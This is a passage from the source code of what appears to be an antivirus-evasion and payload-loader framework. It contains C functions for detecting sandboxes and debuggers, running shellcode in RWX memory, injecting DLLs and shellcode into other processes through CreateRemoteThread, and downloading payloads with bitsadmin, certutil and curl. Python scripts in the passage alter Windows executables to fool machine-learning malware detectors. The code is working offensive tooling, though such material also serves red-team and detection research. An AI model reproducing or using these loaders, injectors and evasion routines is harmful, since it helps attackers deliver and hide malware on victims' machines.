                exit(0);
            }

            // Update current search string to next entry
            current_search_str = delim + 1;
        }

        // Process last entry
        if(strstr(szBuffer, current_search_str)) {
            DEBUG_PRINT("Found %s, exiting...\n", current_search_str);
            RegCloseKey(hKey);
            exit(0);
        }

        RegCloseKey(hKey);
    } else {
        DEBUG_PRINT("Could not open registry key.\n");
    }

    DEBUG_PRINT("Found none. Proceeding.\n");
}
--------------------------------------------------------------------------------
/source/implementations/evasion/hide_console.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include "../debug_print/debug_print.h"


// Hides the console window
// arg1 is not used here and therefore ignored
//
// ShowWindow(GetConsoleWindow(), SW_HIDE); the return value is ignored.
// Never exits the process.
void hide_console(char *arg1) {
    DEBUG_PRINT("Hiding console window...\n");
    ShowWindow(GetConsoleWindow(), SW_HIDE);
}
--------------------------------------------------------------------------------
/source/implementations/evasion/interaction_getchar.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include "../debug_print/debug_print.h"


// Wait until input is delivered using getchar.
//
// arg1: not used
//
// Blocks until one byte (or EOF) is available on stdin, then echoes it and continues.
// NOTE(review): getchar() returns int; storing it in `char` loses the EOF
// distinction, so EOF is echoed as a byte as well. Never exits the process.
void interaction_getchar(char *arg1) {
    DEBUG_PRINT("Waiting for input...\n");
    char input = getchar();
    // Output gathered input to avoid dead code
    putchar(input);
    DEBUG_PRINT("Input delivered, proceeding...");
}
--------------------------------------------------------------------------------
/source/implementations/evasion/interaction_msg_box.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include
#include "../debug_print/debug_print.h"


// Spawn message box with hardcoded arithmetic task which only executes of it is solved correctly.
//
// No arg
//
// Spawns a PowerShell WinForms dialog showing the (German-language) prompt
// 'Rechne aus: 5+5' ("calculate 5+5"). The script prints '0' when the entered
// value is 10 and '-1' otherwise; the process proceeds only if the captured
// output contains "0". arg1 is unused.
// Observable host artefact: a powershell.exe child process with this command line.
// NOTE(review): same buffer defect as get_eventlog: retval[10] is uninitialised
// and strcat() appends fgets() lines of up to 127 bytes into it — undefined
// behaviour / stack overflow. malloc() is unchecked, `command` is never freed
// and `fp` is never pclose()d.
void interaction_msg_box(char *arg1) {
    DEBUG_PRINT("Applying interactive_msg_box evasion technique.\n");

    char *call = "powershell.exe ";
    char *pwsh = "Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing;$window = New-Object System.Windows.Forms.Form;$window.Width = 500;$window.Height = 150;$Label = New-Object System.Windows.Forms.Label;$Label.Location = New-Object System.Drawing.Size(10,10);$Label.Text = 'Rechne aus: 5+5';$Label.AutoSize = $True;$window.Controls.Add($Label);$windowButton = New-Object System.Windows.Forms.Button;$windowButton.Location = New-Object System.Drawing.Size(10,60);$windowButton.Size = New-Object System.Drawing.Size(50,30);$windowButton.Text = 'OK';$windowButton.Enabled = $false;$windowTextBox = New-Object System.Windows.Forms.TextBox;$windowTextBox.Location = New-Object System.Drawing.Size(10,30);$windowTextBox.Size = New-Object System.Drawing.Size(350,350);$windowTextBox.add_TextChanged({$windowButton.Enabled = $windowTextBox.Text});$window.Controls.Add($windowTextBox);$windowButton.Add_Click({$calc = [int]$windowTextBox.Text;if($calc -eq 10) {Write-Host '0';}else {Write-Host '-1';}$window.Dispose();});$window.Controls.Add($windowButton);[void]$window.ShowDialog();";
    char *command = (char *) malloc(strlen(pwsh) + strlen(call) + 1);
    FILE *fp;
    char buf[128];
    char retval[10];

    strcpy(command, call);
    strcat(command, pwsh);


    if ((fp = popen(command, "r")) == NULL) {
        DEBUG_PRINT("Error opening pipe!\n");
        exit(0);
    }

    while (fgets(buf, 128, fp) != NULL) {
        strcat(retval, buf);
    }
    if (strstr(retval, "0")) {
        DEBUG_PRINT("Proceed!\n");
    } else {
        exit(0);
    }
}
--------------------------------------------------------------------------------
/source/implementations/evasion/interaction_system_pause.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include "../debug_print/debug_print.h"


// Execute system("pause"), causing the spawned cmd (and our main process) to wait for any keypress.
//
// arg1: not used
//
// Observable host artefact: a cmd.exe child running "pause". Never exits the process.
void interaction_system_pause(char *arg1) {
    DEBUG_PRINT("Calling system(pause)...\n");
    system("pause");
    DEBUG_PRINT("Proceeding...");
}
--------------------------------------------------------------------------------
/source/implementations/evasion/is_debugger_present.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include
#include
#include
#include "../debug_print/debug_print.h"


// Exits if debugger is present
//
// Single IsDebuggerPresent() call; exit(0) when it reports an attached
// debugger, otherwise continue. arg1 is unused.
void is_debugger_present(char *arg1) {

    if(!IsDebuggerPresent()) {
        DEBUG_PRINT("Proceed!\n");
    } else {
        exit(0);
    }
}
--------------------------------------------------------------------------------
/source/implementations/evasion/sleep_by_ping.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include
#include "../debug_print/debug_print.h"


// Halt execution of the program for arg1 seconds by invoking a timed ping command against localhost.
// Will ping once each second, for arg1 times.
//
// arg1: ping duration in seconds
//
// Delay implemented as system("ping 127.0.0.1 -n <arg1>"), i.e. arg1 echo
// requests to loopback. Observable host artefacts: cmd.exe and ping.exe child
// processes and ICMP traffic to 127.0.0.1. Never exits the process.
// NOTE(review): arg1 is concatenated unvalidated into a shell command line, so
// it must be a plain integer; any other content changes the executed command.
// NOTE(review): malloc() is unchecked.
void sleep_by_ping(char *arg1) {
    DEBUG_PRINT("Applying sleep_by_ping technique.\n");
    DEBUG_PRINT("Pinging localhost for %s seconds.\n", arg1);

    char *ping_command = "ping 127.0.0.1 -n ";
    char *complete_command = (char *) malloc(strlen(ping_command) + strlen(arg1) + 1);
    strcpy(complete_command, ping_command);
    strcat(complete_command, arg1);
    DEBUG_PRINT("Invoking command %s \n", complete_command);
    system(complete_command);
    free(complete_command);
    DEBUG_PRINT("Ping finished, proceeding...");
}
--------------------------------------------------------------------------------
/source/implementations/gen_adversarial_exe/malconv/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/govolution/avet/6da43bff14a81327143fd67433b821a9c85d99f8/source/implementations/gen_adversarial_exe/malconv/__init__.py
--------------------------------------------------------------------------------
/source/implementations/gen_adversarial_exe/malconv/pretrained_malconv.pth:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/govolution/avet/6da43bff14a81327143fd67433b821a9c85d99f8/source/implementations/gen_adversarial_exe/malconv/pretrained_malconv.pth
--------------------------------------------------------------------------------
/source/implementations/gen_adversarial_exe/practical_manipulations/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/govolution/avet/6da43bff14a81327143fd67433b821a9c85d99f8/source/implementations/gen_adversarial_exe/practical_manipulations/__init__.py
--------------------------------------------------------------------------------
/source/implementations/gen_adversarial_exe/practical_manipulations/full_dos.py:
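--------------------------------------------------------------------------------
"""
Implementation of Full DOS practical manipulation from
Adversarial EXEmples: A Survey and Experimental Evaluation of
Practical Attacks on Machine Learning for Windows Malware Detection
by Demetrio et al.

Can be used standalone with random bytes or via genetic optimizer.
"""

import os
import sys
import copy

import lief


def _dos_range_to_perturb(pe_header_offset):
    """
    Return the list of file offsets that Full DOS is allowed to overwrite.

    Everything in the DOS header and stub is fair game except the two fields the
    loader actually reads: the "MZ" magic at 0x00-0x01 and e_lfanew at 0x3c-0x3f
    (the offset of the PE header, pe_header_offset). If e_lfanew is smaller than
    0x40 the second range is simply empty.
    """
    return list(range(2, 0x3c)) + list(range(0x40, pe_header_offset))


def full_dos_on_bytes(exe_bytes: bytearray, section_population, vector_t):
    """
    Implementation of Full DOS practical manipulation.
    Intended for use with genetic optimizer.

    exe_bytes:          raw bytes of the PE file (left untouched; a copy is returned)
    section_population: candidate byte sequences supplied by the optimizer
    vector_t:           per-section fraction of how much of each sequence to use

    Returns the bytes with the practical manipulation applied.
    """

    # Build the injection content from the leading vector_t[i] share of every section.
    content = bytearray()
    for i, section in enumerate(section_population):
        content += section[:int(round(len(section) * vector_t[i]))]

    exe_object: lief.PE.Binary = lief.parse(exe_bytes)

    # get range allowed to perturb
    range_to_perturb = _dos_range_to_perturb(exe_object.dos_header.addressof_new_exeheader)

    raw_bytes = copy.deepcopy(exe_bytes)

    # Every vector_t entry rounded to zero: nothing to write, and the modulo below
    # would divide by zero. Return the untouched copy instead.
    if not content:
        return raw_bytes

    # perturb DOS header, cycling through the content if it is shorter than the range
    for counter, offset in enumerate(range_to_perturb):
        raw_bytes[offset] = content[counter % len(content)]

    return raw_bytes


def full_dos(exe_path):
    """
    Implementation of Full DOS practical manipulation.

    Create an adversarial example with practical manipulation applied.
    Random bytes are used and new sample has "_full_dos" as postfix.
    The input file is only read; the result is written next to it.
    """

    print(f"Executing Full DOS manipulation on: {exe_path}")

    exe_object: lief.PE.Binary = lief.parse(exe_path)

    # get range allowed to perturb
    range_to_perturb = _dos_range_to_perturb(exe_object.dos_header.addressof_new_exeheader)

    # read-only access is all that is needed here (was 'r+b')
    with open(exe_path, 'rb') as f:
        raw_bytes = bytearray(f.read())

    # perturb DOS header with one fresh random byte per allowed offset
    for offset, value in zip(range_to_perturb, os.urandom(len(range_to_perturb))):
        raw_bytes[offset] = value

    # strip whatever extension the input has instead of blindly dropping 4 characters
    base_name = os.path.splitext(exe_path)[0]
    with open(f"{base_name}_full_dos.exe", 'wb') as nf:
        # create executable
        nf.write(raw_bytes)


# run as script
if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} <input.exe>")
    full_dos(sys.argv[1])

--------------------------------------------------------------------------------
/source/implementations/gen_adversarial_exe/practical_manipulations/padding.py:
--------------------------------------------------------------------------------
"""
Implementation of Padding practical manipulation from
Functionality-Preserving Black-Box Optimization of Adversarial Windows Malware
by Demetrio et al.

Can be used standalone with random bytes or via genetic optimizer.
"""

import copy
import os
import sys


def padding_on_bytes(exe_bytes: bytearray, section_population, vector_t):
    """
    Implementation of Padding practical manipulation.
    Intended for use with genetic optimizer.

    exe_bytes:          raw bytes of the PE file (left untouched; a copy is returned)
    section_population: candidate byte sequences supplied by the optimizer
    vector_t:           per-section fraction of how much of each sequence to use

    Returns the bytes with the practical manipulation applied: the selected
    content is appended after the end of the file, no header is touched.
    """

    content = bytearray()
    for i, section in enumerate(section_population):
        content += section[:int(round(len(section) * vector_t[i]))]

    raw_bytes = copy.deepcopy(exe_bytes)

    # append content
    raw_bytes += content

    return raw_bytes


def padding(exe_path, amount):
    """
    Implementation of Padding practical manipulation.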
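
    Create an adversarial example with practical manipulation applied.
    Random bytes are used and new sample has "_padding" as postfix.

    exe_path: path of the PE file to read (left unchanged)
    amount:   number of random bytes to append
    """

    print(f"Executing Padding manipulation on: {exe_path}")

    # read-only access is all that is needed here (was 'r+b')
    with open(exe_path, 'rb') as f:
        raw_bytes = bytearray(f.read())

    # append content
    raw_bytes += os.urandom(amount)

    # strip whatever extension the input has instead of blindly dropping 4 characters
    base_name = os.path.splitext(exe_path)[0]
    with open(f"{base_name}_padding.exe", 'wb') as nf:
        nf.write(raw_bytes)


# run as script
if __name__ == "__main__":
    if len(sys.argv) not in (2, 3):
        sys.exit(f"usage: {sys.argv[0]} <input.exe> [amount]")

    amount = 512
    if len(sys.argv) == 3:
        amount = int(sys.argv[2])

    padding(sys.argv[1], amount)

--------------------------------------------------------------------------------
/source/implementations/gen_adversarial_exe/practical_manipulations/partial_dos.py:
--------------------------------------------------------------------------------
"""
Implementation of Partial DOS proposed in
Explaining Vulnerabilities of Deep Learning to Adversarial Malware Binaries
by Demetrio et al.

Can be used standalone with random bytes or via genetic optimizer.
This file is not relevant for thesis.
"""

import os
import sys
import copy


# Offsets 0x02-0x3b of the DOS header: everything between the "MZ" magic and e_lfanew.
_PARTIAL_DOS_RANGE = list(range(2, 0x3C))


def partial_dos_on_bytes(exe_bytes: bytearray, section_population, vector_t):
    """
    Implementation of Partial DOS practical manipulation.
    Intended for use with genetic optimizer.

    Only the 58 bytes of the DOS header between the magic and e_lfanew are
    overwritten; the DOS stub after the header is left alone.

    Returns the bytes with the practical manipulation applied.
    """
    content = bytearray()
    for i, section in enumerate(section_population):
        content += section[:int(round(len(section) * vector_t[i]))]

    raw_bytes = copy.deepcopy(exe_bytes)

    # Every vector_t entry rounded to zero: nothing to write, and the modulo below
    # would divide by zero. Return the untouched copy instead.
    if not content:
        return raw_bytes

    for counter, offset in enumerate(_PARTIAL_DOS_RANGE):
        raw_bytes[offset] = content[counter % len(content)]

    return raw_bytes


def partial_dos(exe_path):
    """
    Implementation of Partial DOS practical manipulation.

    Create an adversarial example with random bytes in the DOS header;
    the new sample has "_partial_dos" as postfix.
    """
    print(f"Executing Partial DOS manipulation on: {exe_path}")

    with open(exe_path, 'rb') as f:
        raw_bytes = bytearray(f.read())

    # one fresh random byte per offset
    for offset, value in zip(_PARTIAL_DOS_RANGE, os.urandom(len(_PARTIAL_DOS_RANGE))):
        raw_bytes[offset] = value

    base_name = os.path.splitext(exe_path)[0]
    with open(f"{base_name}_partial_dos.exe", 'wb') as nf:
        nf.write(raw_bytes)


# run as script
if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} <input.exe>")
    partial_dos(sys.argv[1])

--------------------------------------------------------------------------------
/source/implementations/gen_adversarial_exe/practical_manipulations/section_injection.py:
--------------------------------------------------------------------------------
"""
Implementation of Section Injection practical manipulation from
Functionality-Preserving Black-Box Optimization of Adversarial Windows Malware
by Demetrio et al.

Can be used standalone with random bytes or via genetic optimizer.
"""

import os
import random
import string
import sys

import lief


def section_injection_on_bytes(exe_bytes: bytearray, section_population, vector_t):
    """
    Implementation of Section Injection practical manipulation.
    Intended for use with genetic optimizer.

    Returns the bytes with the practical manipulation applied.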
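    """

    content = bytearray()
    for i, section in enumerate(section_population):
        content += section[:int(round(len(section) * vector_t[i]))]

    exe_object: lief.PE.Binary = lief.parse(exe_bytes)

    new_section = lief.PE.Section(_random_section_name())

    new_section.content = content
    # Discardable only: nothing in the binary ever reads or executes the new section.
    new_section.characteristics = lief.PE.SECTION_CHARACTERISTICS.MEM_DISCARDABLE
    exe_object.add_section(new_section)

    builder = lief.PE.Builder(exe_object)
    builder.build()

    return bytearray(builder.get_build())


def _random_section_name():
    """Five random lowercase letters; fits the 8-byte PE section name field."""
    return ''.join(random.choice(string.ascii_lowercase) for _ in range(5))


def section_injection(exe_path, amount):
    """
    Implementation of Section Injection practical manipulation.

    Create an adversarial example with practical manipulation applied.
    Random bytes are used and new sample has "_section_injection" as postfix.

    exe_path: path of the PE file to read (left unchanged)
    amount:   number of random bytes in the injected section
    """

    print(f"Executing Section Injection manipulation on: {exe_path}")

    exe_object: lief.PE.Binary = lief.parse(exe_path)

    new_section = lief.PE.Section(_random_section_name())
    # one random byte per position, handed to lief as a list of ints like before
    new_section.content = list(os.urandom(amount))
    new_section.characteristics = lief.PE.SECTION_CHARACTERISTICS.MEM_DISCARDABLE
    exe_object.add_section(new_section)

    builder = lief.PE.Builder(exe_object)
    builder.build()
    # strip whatever extension the input has instead of blindly dropping 4 characters
    base_name = os.path.splitext(exe_path)[0]
    builder.write(f"{base_name}_section_injection.exe")


# run as script
if __name__ == "__main__":
    if len(sys.argv) not in (2, 3):
        sys.exit(f"usage: {sys.argv[0]} <input.exe> [amount]")

    amount = 512
    if len(sys.argv) == 3:
        amount = int(sys.argv[2])

    section_injection(sys.argv[1], amount)

--------------------------------------------------------------------------------
/source/implementations/payload_execution_method/exec_shellcode.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include "../debug_print/debug_print.h"
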
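
// Execute shellcode in-process by calling it like a function.
// Currently ignores payload_info.
// Currently also ignores shellcode_size, as the function binding does not require it.
// NOTE(review): no VirtualProtect here, so the buffer must already be executable
// where DEP/NX applies; exec_shellcode64 is the variant that sets RWX first.
//
// shellcode:      pointer to the raw code (NULL -> nothing happens)
// shellcode_size: unused
// payload_info:   unused
void exec_shellcode(unsigned char *shellcode, int shellcode_size, char *payload_info) {
    (void) shellcode_size;
    (void) payload_info;

    DEBUG_PRINT("exec_shellcode called.\n");

    // Check for NULL pointer to handle cases where no shellcode data was retrieved
    if(shellcode == NULL) {
        return;
    }

    // Reinterpret the buffer as a function and jump into it.
    int (*funct)() = (int (*)()) shellcode;
    funct();
}

--------------------------------------------------------------------------------
/source/implementations/payload_execution_method/exec_shellcode64.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include "../debug_print/debug_print.h"


// Execute shellcode in-process after marking its memory executable.
// Currently ignores payload_info.
// Requires shellcode_size for VirtualProtect call.
//
// shellcode:      pointer to the raw code (NULL -> nothing happens)
// shellcode_size: length in bytes of the region to mark RWX; must be > 0
// payload_info:   unused
void exec_shellcode64(unsigned char *shellcode, int shellcode_size, char *payload_info) {
    (void) payload_info;

    DEBUG_PRINT("exec_shellcode64 called\n");
    DEBUG_PRINT("Shellcode size: %d\n", shellcode_size);

    // Check for NULL pointer to handle cases where no shellcode data was retrieved
    if(shellcode == NULL) {
        return;
    }
    // A zero or negative size would reach VirtualProtect as a huge SIZE_T.
    if(shellcode_size <= 0) {
        DEBUG_PRINT("exec_shellcode64: invalid shellcode size, not executing.\n");
        return;
    }

    // Make the buffer executable. The result used to be ignored; if the call fails
    // the jump below would fault on DEP-enabled systems, so bail out instead.
    DWORD old_protection = 0;
    if(!VirtualProtect(shellcode, (SIZE_T) shellcode_size, PAGE_EXECUTE_READWRITE, &old_protection)) {
        DEBUG_PRINT("exec_shellcode64: VirtualProtect failed, system error code is %u.\n", GetLastError());
        return;
    }

    (* (int(*)()) shellcode)();
}

--------------------------------------------------------------------------------
/source/implementations/payload_execution_method/exec_shellcode_ASCIIMSF.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include "../debug_print/debug_print.h"


// Currently ignores payload_info
// Currently also ignores shellcode_size, as it is not required by the function binding
void exec_shellcode_ASCIIMSF(unsigned char *shellcode, int shellcode_size, char *payload_info) {
    DEBUG_PRINT("exec_shellcode_ASCIIMSF called\n");

    //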
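    // Check for NULL pointer to handle cases where no shellcode data was retrieved
    if(shellcode != NULL) {
        // 32-bit only: the shellcode address is pinned to EAX and called via inline asm.
        register unsigned char *r asm("eax");
        r = shellcode;
        asm("call *%eax;");
    }
}

--------------------------------------------------------------------------------
/source/implementations/payload_execution_method/inject_dll.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include
#include "../debug_print/debug_print.h"


// payload_info format: pid,dll_path
// pid specifies the process ID of the process to inject the DLL into
// dll_path specifies the path of the DLL that will be injected into the target.
// This implies that the DLL to be injected must reside on the target's disk.
//
// This was successfully tested on both 32 and 64-bit systems.
// Friendly reminder: only inject 32-bit dlls into 32-bit processes, and 64-bit dlls into 64-bit processes
//
// Technique: OpenProcess -> VirtualAllocEx (path string) -> WriteProcessMem -> CreateRemoteThread(LoadLibraryA, path).
// The LoadLibraryA address is looked up in our own kernel32 and reused in the target,
// which only works when both processes map kernel32 at the same address (same bitness).
//
// payload / payload_size: unused, the target loads the DLL itself from dll_path
// payload_info: "<pid>,<dll_path>"; modified in place (the ',' is overwritten with '\0')
void inject_dll(unsigned char *payload, int payload_size, char *payload_info) {
    char *delimiter;
    char *target_pid_string;
    char *dll_path;
    size_t dll_path_size;
    DWORD target_pid;
    LPVOID loadlibrary_address;
    LPVOID remote_buffer;
    HANDLE h_proc = NULL;
    HANDLE h_remote_thread = NULL;

    (void) payload;
    (void) payload_size;

    DEBUG_PRINT("Starting inject_dll routine...\n");

    // Extract arguments from payload_info
    // Both pid and dll_path are required; without the ',' delimiter strchr() returns NULL
    // and the old code dereferenced it.
    if(payload_info == NULL || (delimiter = strchr(payload_info, ',')) == NULL) {
        DEBUG_PRINT("payload_info must be of the form pid,dll_path.\n");
        return;
    }

    // Cut out pid string by ending the string at delimiter position
    target_pid_string = payload_info;
    *delimiter = '\0';
    target_pid = strtoul(target_pid_string, NULL, 0);
    DEBUG_PRINT("Extracted payload_info::target_pid argument = %u\n", target_pid);

    // Extract dll_path string by starting after the delimiter
    dll_path = delimiter + 1;
    DEBUG_PRINT("Extracted payload_info::dll_path argument = %s\n", dll_path);

    if(target_pid == 0 || *dll_path == '\0') {
        DEBUG_PRINT("Invalid target PID or empty dll path.\n");
        return;
    }

    // Access target process
    DEBUG_PRINT("Accessing target process...\n");
    h_proc = OpenProcess((PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ), FALSE, target_pid);
    if(h_proc == NULL) {
        DEBUG_PRINT("Failed to retrieve handle.\n");
        return;
    }

    // Retrieve address of LoadLibraryA function
    DEBUG_PRINT("Retrieving address of LoadLibraryA function...\n");
    loadlibrary_address = (LPVOID) GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
    if(loadlibrary_address == NULL) {
        DEBUG_PRINT("Failed to retrieve address.\n");
        goto cleanup;
    }

    // Allocate buffer in target process to store the path to the dll to be injected.
    // The terminating NUL has to travel with the string: LoadLibraryA in the target reads a
    // C string, and the previous strlen()-sized allocation/write left it unterminated.
    dll_path_size = strlen(dll_path) + 1;
    DEBUG_PRINT("Allocating at least %lu bytes of memory in target process to store dll path...\n", (unsigned long) dll_path_size);
    remote_buffer = VirtualAllocEx(h_proc, NULL, dll_path_size, (MEM_RESERVE | MEM_COMMIT), PAGE_READWRITE);
    if(remote_buffer == NULL) {
        DEBUG_PRINT("Memory allocation failed, system error code is %u.\n", GetLastError());
        goto cleanup;
    }

    // Write dll path (including its NUL) into allocated memory
    DEBUG_PRINT("Writing dll path into allocated memory...\n");
    if(WriteProcessMemory(h_proc, remote_buffer, (LPCVOID) dll_path, dll_path_size, NULL) == 0) {
        DEBUG_PRINT("Write operation failed, system error code is %u.\n", GetLastError());
        goto cleanup;
    }

    // Creating remote thread that invokes the dll via LoadLibrary
    DEBUG_PRINT("Creating remote thread that invokes the DLL via LoadLibrary...\n");
    h_remote_thread = CreateRemoteThread(h_proc, NULL, 0, (LPTHREAD_START_ROUTINE) loadlibrary_address, remote_buffer, 0, NULL);
    if(h_remote_thread == NULL) {
        DEBUG_PRINT("Thread creation failed, system error code is %u.\n", GetLastError());
    }

cleanup:
    // Both handles used to leak on every error path. The remote buffer is deliberately
    // left mapped: the remote thread reads the path from it after we return.
    if(h_remote_thread != NULL) {
        CloseHandle(h_remote_thread);
    }
    CloseHandle(h_proc);
}

--------------------------------------------------------------------------------
/source/implementations/payload_execution_method/inject_shellcode.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include "../debug_print/debug_print.h"


// payload_info format: pid
// pid specifies the process ID of the process to inject the shellcode into.
//
// This was successfully tested on both 32 and 64 bit systems
//
// Technique: OpenProcess -> VirtualAllocEx(RWX) -> WriteProcessMemory -> CreateRemoteThread at the buffer.
// NOTE(review): the buffer is allocated PAGE_EXECUTE_READWRITE in one step; writing RW and
// flipping to RX with VirtualProtectEx would be the least-privilege variant — left as is.
//
// shellcode / shellcode_size: bytes to copy into the target (NULL or size <= 0 -> nothing happens)
// payload_info: PID string, parsed with strtoul(..., 0) so "0x" prefixes are accepted
void inject_shellcode(unsigned char *shellcode, int shellcode_size, char *payload_info) {
    DEBUG_PRINT("Starting inject_shellcode routine...\n");

    // A negative size would otherwise become a huge SIZE_T in the calls below.
    if(shellcode == NULL || shellcode_size <= 0 || payload_info == NULL) {
        DEBUG_PRINT("Nothing to inject (missing shellcode, size or payload_info).\n");
        return;
    }

    // Extract PID from payload_info
    DWORD target_pid = strtoul(payload_info, NULL, 0);
    DEBUG_PRINT("Extracted payload_info::target_pid argument = %u\n", target_pid);

    if(target_pid == 0) {
        DEBUG_PRINT("Invalid target PID.\n");
        return;
    }

    // Access target process
    DEBUG_PRINT("Accessing target process...\n");
    HANDLE h_proc = OpenProcess((PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ), FALSE, target_pid);

    if(h_proc == NULL) {
        DEBUG_PRINT("Failed to retrieve handle.\n");
        return;
    }

    HANDLE h_remote_thread = NULL;

    // Allocate target memory for the shellcode
    DEBUG_PRINT("Allocating memory in target process...\n");
    PVOID remote_buffer = VirtualAllocEx(h_proc, NULL, (SIZE_T) shellcode_size, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);

    if(remote_buffer == NULL) {
        DEBUG_PRINT("Memory allocation failed.\n");
        goto cleanup;
    }

    // Write shellcode into allocated target buffer
    DEBUG_PRINT("Writing shellcode into allocated target buffer...\n");
    if(WriteProcessMemory(h_proc, remote_buffer, (PBYTE) shellcode, (SIZE_T) shellcode_size, NULL) == 0) {
        DEBUG_PRINT("Write operation failed.\n");
        goto cleanup;
    }

    // Create and start new thread in the remote process, executing the shellcode
    DEBUG_PRINT("Creating new remote thread to execute shellcode...\n");
    h_remote_thread = CreateRemoteThread(h_proc, NULL, 0, (LPTHREAD_START_ROUTINE) remote_buffer, NULL, 0, NULL);
    if(h_remote_thread == NULL) {
        DEBUG_PRINT("Thread creation failed.\n");
    }

cleanup:
    // Handles used to leak on every error path. The remote buffer stays mapped on purpose:
    // the new thread executes from it.
    if(h_remote_thread != NULL) {
        CloseHandle(h_remote_thread);
    }
    CloseHandle(h_proc);
}

--------------------------------------------------------------------------------
/source/implementations/retrieve_data/download_bitsadmin.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include
#include "../debug_print/debug_print.h"
#include "helper_functions/helper_functions.h"


// Downloads data from the URI specified in arg1 into a file, using the BITSADMIN Windows tool.
// The data is then read from the file and returned.
//
// arg1: URL; the part after the last '/' becomes the local file name. arg1 is spliced
//       unquoted into a cmd.exe command line, so it must not carry shell metacharacters.
// data_size receives the size of the data in bytes.
// Returns the buffer from load_textfile (owned by the caller) or NULL on failure.
unsigned char *download_bitsadmin(char *arg1, int *data_size) {
    DEBUG_PRINT("Downloading data to file via bitsadmin...\n");

    // File will be named as on the server
    char sh_filename[128];
    char *url_filename = get_filename_from_url(arg1);
    // Bound the copy: a long URL tail would otherwise run past the 128-byte buffer.
    if(strlen(url_filename) >= sizeof(sh_filename)) {
        DEBUG_PRINT("File name from URL is too long.\n");
        *data_size = 0;
        return NULL;
    }
    strcpy(sh_filename, url_filename);

    DEBUG_PRINT("sh_filename = %s\n", sh_filename);

    // Bitsadmin expects a full path.
    // Acquire full path + file name of this process.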
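    char current_path[MAX_PATH];
    GetModuleFileNameA(NULL, current_path, MAX_PATH);

    // Replace executable name with payload name (after last '\').
    // The old code did strrchr()+1 unchecked (NULL+1 if no '\') and an unbounded strcpy;
    // make sure directory + file name + NUL still fit into MAX_PATH.
    char *name_position = strrchr(current_path, '\\');
    if(name_position == NULL) {
        name_position = current_path;
    } else {
        name_position++;
    }
    if((size_t)(name_position - current_path) + strlen(sh_filename) + 1 > sizeof(current_path)) {
        DEBUG_PRINT("Target path is too long.\n");
        *data_size = 0;
        return NULL;
    }
    strcpy(name_position, sh_filename);

    DEBUG_PRINT("current_path = %s\n", current_path);

    // Build the bitsadmin command line; refuse to run a truncated one rather than a mangled one.
    char download[500];
    int written = snprintf(download, sizeof(download), "bitsadmin.exe /transfer \"WinBitsJob\" %s %s", arg1, current_path);
    if(written < 0 || (size_t) written >= sizeof(download)) {
        DEBUG_PRINT("Command line does not fit into the buffer.\n");
        *data_size = 0;
        return NULL;
    }

    DEBUG_PRINT("command: %s\n", download);
    system(download);
    DEBUG_PRINT("Download done.\n");

    // bitsadmin wrote to the absolute current_path; reading the bare sh_filename only
    // worked when the working directory happened to be the executable's directory.
    *data_size = get_filesize(current_path);
    return load_textfile(current_path, *data_size);
}


--------------------------------------------------------------------------------
/source/implementations/retrieve_data/download_certutil.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include
#include "../debug_print/debug_print.h"
#include "helper_functions/helper_functions.h"


// Downloads data from the URI specified in arg1 to a file.
// The data is then retrieved from the file.
//
// arg1: URL; spliced unquoted into a cmd.exe command line (no shell metacharacters).
//       certutil names the local file after the part following the last '/'.
// data_size receives the size of the data in bytes.
unsigned char* download_certutil(char *arg1, int *data_size) {
    DEBUG_PRINT("Downloading data to file via certutil...\n");

    char download[500]; //how not to do it...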
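    // Build the certutil command line; refuse to run a truncated one rather than a mangled one.
    int written = snprintf(download, sizeof(download), "certutil.exe -urlcache -split -f %s", arg1);
    if(written < 0 || (size_t) written >= sizeof(download)) {
        DEBUG_PRINT("Command line does not fit into the buffer.\n");
        *data_size = 0;
        return NULL;
    }

    DEBUG_PRINT("url: %s\n", download);

    system(download);

    DEBUG_PRINT("Download done.\n");

    // local file name = last URL path component; bound the copy into the 128-byte buffer
    char sh_filename[128];
    char *url_filename = get_filename_from_url(arg1);
    if(strlen(url_filename) >= sizeof(sh_filename)) {
        DEBUG_PRINT("File name from URL is too long.\n");
        *data_size = 0;
        return NULL;
    }
    strcpy(sh_filename, url_filename);

    DEBUG_PRINT("sh_filename = %s\n", sh_filename);

    *data_size = get_filesize(sh_filename);
    return load_textfile(sh_filename, *data_size);
}

--------------------------------------------------------------------------------
/source/implementations/retrieve_data/download_curl.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include
#include "../debug_print/debug_print.h"
#include "helper_functions/helper_functions.h"

// Downloads data with curl.exe into a file named after the last URL path component.
// The data is then read from the file and returned.
//
// arg1: URL; spliced unquoted into a cmd.exe command line, so no shell metacharacters.
// data_size receives the size of the data in bytes.
// Returns the buffer from load_textfile (owned by the caller) or NULL if a buffer would overflow.

unsigned char *download_curl(char *arg1, int *data_size) {
    DEBUG_PRINT("Downloading data to file via curl...\n");

    char sh_filename[128];
    char *url_filename = get_filename_from_url(arg1);
    if(strlen(url_filename) >= sizeof(sh_filename)) {
        DEBUG_PRINT("File name from URL is too long.\n");
        *data_size = 0;
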